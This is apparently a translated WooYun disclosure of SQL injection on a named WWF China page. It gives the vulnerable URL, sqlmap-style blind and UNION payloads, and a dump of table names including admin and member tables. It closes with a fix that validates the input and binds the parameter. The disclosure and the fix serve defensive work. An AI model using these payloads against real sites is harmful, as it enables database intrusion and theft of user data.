
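Vulnerability summary

Bug ID: wooyun-2014-070470

Title: Multiple SQL injections at a certain world nature foundation

Vendor: WWF (World Wide Fund for Nature) official website

Author: 招收技术员

Submitted: 2014-07-31 15:55

Fixed: 2014-09-14 15:56

Disclosed: 2014-09-14 15:56

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: Unable to contact the vendor, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]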


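Vulnerability details

Disclosure status:

2014-07-31: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2014-09-14: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Multiple SQL injections at a certain foundation

Detailed description:

Multiple SQL injections: http://www.wwfchina.org/camp-progress.php?year=2014

Proof of vulnerability: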

Place: GET
Parameter: year
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: year=2014 AND 9430=9430
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: year=2014 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7a646a3a,0x4c5a64674a436c6e4b48,0x3a6d747a3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: year=2014 AND SLEEP(5)
Database: wwfchina
[42 tables]
+---------------------------------------+
| campaign_iwtc |
| campaign_waa2012city |
| campaign_waa2012user |
| feedback |
| fox_adminuser |
| fox_campaign |
| fox_category |
| fox_config |
| fox_intro |
| fox_job |
| fox_media |
| fox_media_type |
| fox_news |
| fox_newsletter |
| fox_office |
| fox_pandapal |
| fox_print |
| fox_project |
| fox_publication |
| fox_special |
| fox_specialdetail |
| fox_sponsor |
| fox_staff |
| fox_story |
| fox_video |
| fox_wallpaper |
| fox_wiki |
| fox_wikiattachment |
| fox_wwfaction |
| home_info |
| oldpublication |
| pandapal_survey |
| qqimport |
| signup |
| volunteer |
| volunteer_option_work |
| volunteer_worklog |
| weibouser |
| wwf_member |
| wwfmember |
| wwfmembertemp |
| wwfpress |
+---------------------------------------+
Database: information_schema
[40 tables]
adminuser and member, you know what that means!

Suggested fix:

Filter the input!
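
One way to apply this fix to the numeric `year` parameter, as an added example that is not part of the original report or the site's code: strict validation followed by a bound integer parameter. The table `camp_progress`, its columns, the function names and the in-memory SQLite database are assumptions made so the example runs offline; the two rejected inputs are the boolean-based and time-based payloads from the proof above.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the database. Assumption: the real site uses MySQL
// and its schema is not shown; SQLite in memory keeps this runnable offline.
function demo_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE camp_progress (year INTEGER, title TEXT)');
    $pdo->exec("INSERT INTO camp_progress VALUES
                (2014, 'constructed row A'), (2013, 'constructed row B')");
    return $pdo;
}

// Accept only a plain four-digit year. Anything else is rejected before it
// can reach the SQL layer.
function parse_year($raw): ?int {
    if (!is_string($raw) || !preg_match('/\A\d{4}\z/', $raw)) {
        return null;
    }
    return (int)$raw;
}

// The value travels as a bound integer parameter, never as SQL text.
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false so the
// server itself prepares the statement.
function rows_for_year(PDO $pdo, int $year): array {
    $stmt = $pdo->prepare('SELECT title FROM camp_progress WHERE year = :year');
    $stmt->bindValue(':year', $year, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$pdo = demo_db();
// One legitimate value, then two payload strings taken from the proof above.
$inputs = ['2014', '2014 AND 9430=9430', '2014 AND SLEEP(5)'];
foreach ($inputs as $raw) {
    $year = parse_year($raw);
    if ($year === null) {
        echo "rejected: $raw\n";   // a real handler would answer HTTP 400
        continue;
    }
    echo "accepted: $raw -> " . implode(', ', rows_for_year($pdo, $year)) . "\n";
}
```

Validation alone would stop these payloads, but the bound parameter is what keeps the query safe if the validation is later loosened or bypassed.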

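Copyright notice: when reposting, please credit the source 招收技术员@WooYun


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively refused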